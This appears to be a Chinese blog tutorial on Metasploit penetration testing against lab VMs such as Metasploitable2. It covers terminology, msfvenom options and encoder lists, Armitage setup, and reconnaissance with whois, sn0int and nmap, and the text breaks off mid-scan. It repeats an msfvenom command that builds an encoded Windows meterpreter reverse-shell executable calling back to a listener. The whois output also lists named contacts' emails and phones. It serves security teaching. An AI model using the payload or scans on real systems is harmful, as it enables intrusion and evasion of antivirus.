基于Metasploit的软件渗透测试

2022-09-23 20:31:26 浏览数 (2)

Windows 2000 Professional

链接:https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm

提取码:upsm

Windows Server 2003 Standard x64 Edition

链接:https://pan.baidu.com/s/1Ro-BoTmp-1kq0W_lB9Oiww?pwd=ngsb

提取码:ngsb

Windows 7 x64

链接:https://pan.baidu.com/s/1-vLtP58-GXmkau0OLNoGcg?pwd=zp3o

提取码:zp3o

Debian 6(Kali Linux)

链接:https://pan.baidu.com/s/1Uw6SXS8z_IxdkNpLr9y0zQ?pwd=s2i5

提取码:s2i5

安装了Apatche、Tomcat、MySQL、 vsftpd并且配套Web安全测试练习教案

代码语言:javascript复制
cd /usr/local/apache-tomcat-8.5.81/bin 
./startup.sh
service mysql start

打开浏览器输入127.0.0.1:8080/sec/

Metasploitable2-Linux (with vsftpd 2.3.4)

链接:https://pan.baidu.com/s/1a71zOXGi_9aLrXyEnvkHwQ?pwd=17g6

提取码:17g6

解压后直接为vmx文件,直接可用

基本概念

通讯协议

ARP

ICMP

TCP

专业术语

渗透攻击(Exploit)

测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。

攻击载荷(Payload)

我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立个反向连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是能在目标机器上执行有限命令的程序。

Shellcode

是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行之后提供一个可执行命令的shell

模块(Module)

MSF 的模块,由一系列代码组成。

监听器(Listener)

等待来自被攻击机器的incoming 连接的监听在测试者机器上的程序。

编码器(encoders)

msfencode –l 查看可用的编码器(encoders),效果最佳的是x86/shikata_ga_nai

Metasploit用户接口

MSF终端

代码语言:javascript复制
#msfconsole
msf6>help connect

MSF命令行

代码语言:javascript复制
#msfconsole -x script; set rhost [ip]; set lhost [ip]; set PAYLOAD “…”;run
#msfconsole -r path/xxx.rc

Armitage

安装

下载Armitage:https://gitlab.com/kalilinux/packages/armitage

解压armitage

#cd armitage#./package.sh# cd release#lldrwxr-xr-x 2 root root 4096 6月 29 18:40 unixdrwxr-xr-x 2 root root 4096 6月 29 18:40 windows#cd /etc/postgresql/14/main/#gedit pg_hba.conf

注释掉所有

# "local" is for Unix domain socket connections onlylocal all all trust# IPv4 local connections:host all all 127.0.0.1/32 trust# IPv6 local connections:host all all ::1/128 trust

# service postgresql stop# msfdb reinit#service postgresql start#cd /home/jerry/下载/armitage-kali-master/release/unix# ./armitage

产生被控端与主控端
扫描

Metasploit功能程序

MSF攻击荷载生成器

编写语言

输出语言

Python

C

Web 语言

JavaScript

代码语言:javascript复制
# msfvenom -h 
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options]
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=-f exe -o payload.exe

Options:

参数

内容

解析

-l

--list

列出[类型]的所有模块。类型包括:有效载荷、编码器、NOP、平台、ARCH、加密、格式、所有

-p

--payload

要使用的有效负载(-list payloads to list,--list options for arguments)。为自定义指定“-”或STDIN

--list-options

列表--有效载荷的标准、高级和规避选项

-f

--format

输出格式(使用--要列出的列表格式)

-e

--encoder

要使用的编码器(使用--列出要列出的编码器)

--service-name

生成服务二进制文件时要使用的服务名称

--sec-name

生成大型Windows二进制文件时要使用的新节名称。默认值:随机4字符alpha字符串

--smallest

使用所有可用编码器生成尽可能最小的有效负载

--encrypt

要应用于外壳代码的加密或编码类型(使用--list encrypt to list)

--encrypt-key

用于加密的密钥

--encrypt-iv

用于–encrypt的初始化向量

-a

--arch

用于--有效负载和--编码器的体系结构(使用--列出要列出的ARCH)

--platform

用于--有效负载的平台(使用--列出要列出的平台)

-o

--out

将有效负载保存到文件

-b

--bad-chars

要避免的字符示例:“\x00\xff”

-n

--nopsled

将[长度]大小的NOSLED预先添加到有效负载上

--pad-nops

使用-n指定的nopled size作为总有效负载大小,自动在nopled前面加上数量(nops减去有效负载长度)

-s

--space

产生的有效负载的最大大小

--encoder-space

编码有效负载的最大大小(默认为-s值)

-i

--iterations

对有效负载进行编码的次数

-c

--add-code

指定要包含的其他win32外壳代码文件

-x

--template

指定要用作模板的自定义可执行文件

-k

--keep

保留--template行为并将负载作为新线程注入

-v

--var-name

指定用于特定输出格式的自定义变量名称

-t

--timeout

从STDIN读取有效负载时等待的秒数(默认值为30,0表示禁用)

-h

--help

显示此消息

MSF编码器

代码语言:javascript复制
# msfvenom -l encoders
Framework Encoders [--encoder]

Name

Rank

Description

cmd/brace

low

Bash Brace Expansion Command Encoder

cmd/echo

good

Echo Command Encoder

cmd/generic_sh

manual

Generic Shell Variable Substitution Command Encoder

cmd/ifs

low

Bourne ${IFS} Substitution Command Encoder

cmd/perl

normal

Perl Command Encoder

cmd/powershell_base64

excellent

Powershell Base64 Command Encoder

cmd/printf_php_mq

manual

printf(1) via PHP magic_quotes Utility Command Encoder

generic/eicar

manual

The EICAR Encoder

generic/none

normal

The "none" Encoder

mipsbe/byte_xori

normal

Byte XORi Encoder

mipsbe/longxor

normal

XOR Encoder

mipsle/byte_xori

normal

Byte XORi Encoder

mipsle/longxor

normal

XOR Encoder

php/base64

great

PHP Base64 Encoder

ppc/longxor

normal

PPC LongXOR Encoder

ppc/longxor_tag

normal

PPC LongXOR Encoder

ruby/base64

great

Ruby Base64 Encoder

sparc/longxor_tag

normal

SPARC DWORD XOR Encoder

x64/xor

normal

XOR Encoder

x64/xor_context

normal

Hostname-based Context Keyed Payload Encoder

x64/xor_dynamic

normal

Dynamic key XOR Encoder

x64/zutto_dekiru

manual

Zutto Dekiru

x86/add_sub

manual

Add/Sub Encoder

x86/alpha_mixed

low

Alpha2 Alphanumeric Mixedcase Encoder

x86/alpha_upper

low

Alpha2 Alphanumeric Uppercase Encoder

x86/avoid_underscore_tolower

manual

Avoid underscore/tolower

x86/avoid_utf8_tolower

manual

Avoid UTF8/tolower

x86/bloxor

manual

BloXor - A Metamorphic Block Based XOR Encoder

x86/bmp_polyglot

manual

BMP Polyglot

x86/call4_dword_xor

normal

Call 4 Dword XOR Encoder

x86/context_cpuid

manual

CPUID-based Context Keyed Payload Encoder

x86/context_stat

manual

stat(2)-based Context Keyed Payload Encoder

x86/context_time

manual

time(2)-based Context Keyed Payload Encoder

x86/countdown

normal

Single-byte XOR Countdown Encoder

x86/fnstenv_mov

normal

Variable-length Fnstenv/mov Dword XOR Encoder

x86/jmp_call_additive

normal

Jump/Call XOR Additive Feedback Encoder

x86/nonalpha

low

Non-Alpha Encoder

x86/nonupper

low

Non-Upper Encoder

x86/opt_sub

manual

Sub Encoder (optimised)

x86/service

manual

Register Service

x86/shikata_ga_nai

excellent

Polymorphic XOR Additive Feedback Encoder

x86/single_static_bit

manual

Single Static Bit

x86/unicode_mixed

manual

Alpha2 Alphanumeric Unicode Mixedcase Encoder

x86/unicode_upper

manual

Alpha2 Alphanumeric Unicode Uppercase Encoder

x86/xor_dynamic

normal

Dynamic key XOR Encoder

代码语言:javascript复制
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

MSF攻击载荷

代码语言:javascript复制
# msfvenom -l payloads

MSF NOP

代码语言:javascript复制
# msfvenom -l nops
Framework NOPs (11 total)
=========================    Name             Description
    ----             -----------
    aarch64/simple   Simple NOP generator
    armle/simple     Simple NOP generator
    cmd/generic      Generates harmless padding for command payloads.
    mipsbe/better    Better NOP generator
    php/generic      Generates harmless padding for PHP scripts
    ppc/simple       Simple NOP generator
    sparc/random     SPARC NOP generator
    tty/generic      Generates harmless padding for TTY input
    x64/simple       An x64 single/multi byte NOP instruction generator.
    x86/opty2        Opty2 multi-byte NOP generator
    x86/single_byte  Single-byte NOP generator MSF平台

MSF平台

代码语言:javascript复制
# msfvenom -l platforms


Framework Platforms [--platform]
========================================


    Name
    ----
    aix
    android
    apple_ios
    arista
    brocade
    bsd
    bsdi
    cisco
    firefox
    freebsd
    hardware
    hpux
    irix
    java
    javascript
    juniper
    linux
    mainframe
    mikrotik
    multi
    netbsd
    netware
    nodejs
    openbsd
    osx
    php
    python
    r
    ruby
    solaris
    unifi
    unix
    unknown

Windows

代码语言:javascript复制
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

MSF有效负载和--编码器的体系结构

代码语言:javascript复制
# msfvenom -l archs
Framework Architectures [--arch]
========================================


    Name
    ----
    aarch64
    armbe
    armle
    cbea
    cbea64
    cmd
    dalvik
    firefox
    java
    mips
    mips64
    mips64le
    mipsbe
    mipsle
    nodejs
    php
    ppc
    ppc64
    ppc64le
    ppce500v2
    python
    r
    ruby
    sparc
    sparc64
    tty
    x64
    x86
    x86_64
zarch
代码语言:javascript复制
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

MSF应用于外壳代码的加密或编码类型

代码语言:javascript复制
# msfvenom -l encrypt
Framework Encryption Formats [--encrypt]
================================================
    Name
    ----
    aes256
    base64
    rc4
    xor

MSF文件格式

代码语言:javascript复制
# msfvenom -l formats
msfvenom -l formats
Framework Executable Formats [--format]
===============================================
    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war
Framework Transform Formats [--format]
==============================================


    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    sh
    vbapplication
    vbscript
代码语言:javascript复制
 msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

查看配置

代码语言:javascript复制
# msfvenom -p moduleName --list-options

比如:

代码语言:javascript复制
msfvenom -p windows/shell_reverse_tcp --list-options

Nasm shell

Netwide Assembler (简称 NASM)是一款基于x86架构的汇编与反汇编软件。它可以用来编写16位(8086、80286等)、32位(IA-32)和64位(x86_64)的程序。NASM被认为是Linux平台上最受欢迎的汇编工具之一。

NASM 最初是在朱利安·霍尔(Julian Hall)的协助下由西蒙·泰瑟姆(Simon Tatham)开发的。截至2016年,它被一个由Hans Peter Anvin领导的小团队所维护。 它是一款基于简化版BSD许可证(2-clause BSD License)的开放源代码软件。

代码语言:javascript复制
cd /usr/share/metasploit-framework/tools/exploit
# ./nasm_shell.rb 
nasm > jmp esp
00000000  FFE4              jmp esp
nasm >

Metasploit Express & Metasploit Pro

信息收集

被动信息搜索

Whois

格式

代码语言:javascript复制
msf > whois example.com
msf> whois 192.168.1.100

例子

代码语言:javascript复制
msf6 > whois 3testing.com
[*] exec: whois 3testing.com
   Domain Name: 3TESTING.COM
   Registry Domain ID: 513017975_DOMAIN_COM-VRSN
   Registrar WHOIS Server: grs-whois.hichina.com
   Registrar URL: http://www.net.cn
   Updated Date: 2017-06-27T15:41:17Z
   Creation Date: 2006-07-09T13:24:36Z
   Registry Expiry Date: 2023-07-09T13:24:36Z
   Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
   Registrar IANA ID: 420
   Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
   Registrar Abuse Contact Phone:  86.95187
   Domain Status: ok https://icann.org/epp#ok
   Name Server: DNS10.HICHINA.COM
   Name Server: DNS9.HICHINA.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2022-06-20T04:09:37Z <<<
代码语言:javascript复制
msf6 > whois 123.56.135.186
[*] exec: whois 123.56.135.186
% [whois.apnic.net]
% Whois data copyright termshttp://www.apnic.net/db/dbcopyright.html
% Information related to '123.56.0.0 - 123.57.255.255'
% Abuse contact for '123.56.0.0 - 123.57.255.255' is 'ipas@cnnic.cn'
inetnum:123.56.0.0 - 123.57.255.255
netname:ALISOFT
descr:  Aliyun Computing Co., LTD
descr:  5F, Builing D, the West Lake International Plaza of S&T
descr:  No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country:CN
admin-c:ZM1015-AP
tech-c: ZM877-AP
tech-c: ZM876-AP
tech-c: ZM875-AP
abuse-c:AC1601-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-irt:IRT-CNNIC-CN
last-modified:  2021-06-16T01:25:33Z
source: APNIC


irt:IRT-CNNIC-CN
address:Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:IP50-AP
tech-c: IP50-AP
auth:   # Filtered
remarks:Please note that CNNIC is not an ISP and is not
remarks:empowered to investigate complaints of network abuse.
remarks:Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
last-modified:  2021-06-16T01:39:57Z
source: APNIC


role:   ABUSE CNNICCN
address:Beijing, China
country:ZZ
phone:   000000000
e-mail: ipas@cnnic.cn
admin-c:IP50-AP
tech-c: IP50-AP
nic-hdl:AC1601-AP
remarks:Generated from irt object IRT-CNNIC-CN
abuse-mailbox:  ipas@cnnic.cn
mnt-by: APNIC-ABUSE
last-modified:  2020-05-14T11:19:01Z
source: APNIC


person: Li Jia
address:NO.969 West Wen Yi Road, Yu Hang District, Hangzhou
country:CN
phone:   86-0571-85022088
e-mail: jiali.jl@alibaba-inc.com
nic-hdl:ZM1015-AP
mnt-by: MAINT-CNNIC-AP
last-modified:  2014-07-30T02:02:01Z
source: APNIC


person: Guoxin Gao
address:5F, Builing D, the West Lake International Plaza of S&T
address:No.391 Wen'er Road, Hangzhou City
address:Zhejiang, China, 310099
country:CN
phone:   86-0571-85022600
fax-no:  86-0571-85022600
e-mail: anti-spam@list.alibaba-inc.com
nic-hdl:ZM875-AP
mnt-by: MAINT-CNNIC-AP
last-modified:  2014-07-30T01:56:01Z
source: APNIC


person: security trouble
e-mail: yitian.gaoyt@alibaba-inc.com
address:5th,floor,Building D,the West Lake International Plaza of S&T,391#Wen??r Road
address:Hangzhou, Zhejiang, China
phone:   86-0571-85022600
country:CN
mnt-by: MAINT-CNNIC-AP
nic-hdl:ZM876-AP
last-modified:  2021-04-13T23:22:33Z
source: APNIC


person: Guowei Pan
address:5F, Builing D, the West Lake International Plaza of S&T
address:No.391 Wen'er Road, Hangzhou City
address:Zhejiang, China, 310099
country:CN
phone:   86-0571-85022088-30763
fax-no:  86-0571-85022600
e-mail: guowei.pangw@alibaba-inc.com
nic-hdl:ZM877-AP
mnt-by: MAINT-CNNIC-AP
last-modified:  2013-07-09T01:34:02Z
source: APNIC


% Information related to '123.56.128.0/19AS4837'


route:  123.56.128.0/19
descr:  CNC Group CHINA169 Fujian Province Network
descr:  Addresses from APNIC(YJZXNET)
country:CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
last-modified:  2008-09-04T07:55:26Z
source: APNIC


% This query was served by the APNIC Whois Service version 1.88.16 (WHOIS-AU3)

netcraft

https://www.netcraft.com/

https://searchdns.netcraft.com/

Maltego

sn0int

安装
代码语言:javascript复制
# apt install debian-keyring
# gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add -
# apt-key adv --keyserver keyserver.ubunt.com --refresh-keys dit@rxv.cc
# echo deb http://apt.vulns.sexy stable main>/etc/apt/sources.list.d/apt-vulns-key.list
# apt update
# apt install sn0int
#sn0int
[sn0int][default] > pkg quickstart
使用
代码语言:javascript复制
[sn0int][default] > workspace demo
[ ] Connecting to database
[sn0int][demo] > add domain
[?] Domain: baidu.com
[sn0int][demo] > select domains
#1, "baidu.com"
[sn0int][demo] > use ctlogs
[sn0int][demo][kpcyrd/ctlogs] > run
[sn0int][demo] > use ctlogs
[sn0int][demo][kpcyrd/ctlogs] > run
[*] "baidu.com"             : Adding subdomain "durobotdev.baidu.com"
[*] "baidu.com"             : Adding subdomain "play-infoflow.baidu.com"
[*] "baidu.com"             : Adding subdomain "www.play-infoflow.baidu.com"
[*] "baidu.com"            : Adding subdomain "dlswbr.baidu.com"
[*] "baidu.com"            : Adding subdomain "otapcdn.baidu.com"
[*] "baidu.com"            : Adding subdomain "foundation.baidu.com"
[*] "baidu.com"            : Adding subdomain "mdm-duguanjia.baidu.com"
[*] "baidu.com"            : Adding subdomain "lookup.api.bsb.baidu.com"
[*] "baidu.com"            : Adding subdomain "download.api.bsb.baidu.com"
[*] "baidu.com"           : Adding subdomain "duke.baidu.com"
[*] "baidu.com"           : Adding subdomain "ditan.huodong.baidu.com"
[*] "baidu.com"           : Adding subdomain "httpsdns.baidu.com"
[*] "baidu.com"           : Adding subdomain "vpn.baidu.com"
[*] "baidu.com"           : Adding subdomain "otacdn.baidu.com"
[*] "baidu.com"           : Adding subdomain "trafficsafe.baidu.com"

ZoomEye

nslookup

代码语言:javascript复制
msf6 > nslookup
set type=mx
example.com

例子

代码语言:javascript复制
msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server: 8.8.8.8
Address:8.8.8.8#53
Non-authoritative answer:
Name:   www.3testing.com
Address: 123.56.135.186


msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server:       192.168.0.1
Address:       192.168.0.1#53
Non-authoritative answer:
Name:       www.3testing.com
Address: 123.56.135.186

Google Hacking

主动信息搜索

namp扫描

最基本的扫描

代码语言:javascript复制
#nmap 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:09 CST
Nmap scan report for 192.168.0.106
Host is up (0.0028s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds
扫描活跃的主机 -sn
代码语言:javascript复制
#nmap -sn 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:13 CST
Nmap scan report for 192.168.0.106
Host is up (0.00066s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
扫描多台机器
利用IP1IP2 … IPn
代码语言:javascript复制
# nmap 192.168.0.106 192.168.0.150 192.168.0.158 192.168.0.160
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:27 CST
Nmap scan report for 192.168.0.106
Host is up (0.0017s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)


Nmap scan report for 192.168.0.158
Host is up (0.0087s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.160
Host is up (0.0017s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)


Nmap scan report for 192.168.0.150
Host is up (0.0000040s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
Nmap done: 4 IP addresses (4 hosts up) scanned in 1.08 seconds
利用IP1-IP2
代码语言:javascript复制
# nmap 192.168.0.100-160                                       
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:39 CST
Nmap scan report for 192.168.0.106
Host is up (0.00058s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)


Nmap scan report for 192.168.0.151
Host is up (0.016s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
5357/tcp open  wsdapi
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.158
Host is up (0.016s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.159
Host is up (0.012s latency).
All 1000 scanned ports on 192.168.0.159 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.150
Host is up (0.0000030s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http


Nmap done: 61 IP addresses (5 hosts up) scanned in 4.12 seconds
利用IP/24
代码语言:javascript复制
#nmap192.169.0.0/24 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:34 CST
Nmap scan report for 192.168.0.1
Host is up (0.0086s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
1900/tcp open  upnp
MAC Address: F4:83:CD:A6:DE:E3 (Tp-link Technologies)


Nmap scan report for 192.168.0.106
Host is up (0.0011s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)


Nmap scan report for 192.168.0.151
Host is up (0.017s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
5357/tcp open  wsdapi
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.158
Host is up (0.021s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.159
Host is up (0.013s latency).
All 1000 scanned ports on 192.168.0.159 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)


Nmap scan report for 192.168.0.161
Host is up (0.00029s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)


Nmap scan report for 192.168.0.150
Host is up (0.0000040s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
Nmap done: 256 IP addresses (7 hosts up) scanned in 5.18 seconds
使用ICMP对设备进行扫描
使用ICMP类似Ping的请求响应扫描 -PE
代码语言:javascript复制
#nmap -PE 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:44 CST
Nmap scan report for 192.168.0.106
Host is up (0.00018s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
使用ICMP时间戳响应扫描 -PP
代码语言:javascript复制
#nmap -PP 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:55 CST
Nmap scan report for 192.168.0.106
Host is up (0.0021s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
使用ICMP掩码扫描 -PM
代码语言:javascript复制
#nmap -PM 192.168.0.106
使用TCP对设备进行扫描
使用TCP SYN对设备进行扫描 - PS
代码语言:javascript复制
#nmap -PS 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:02 CST
Nmap scan report for 192.168.0.106
Host is up (0.0022s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
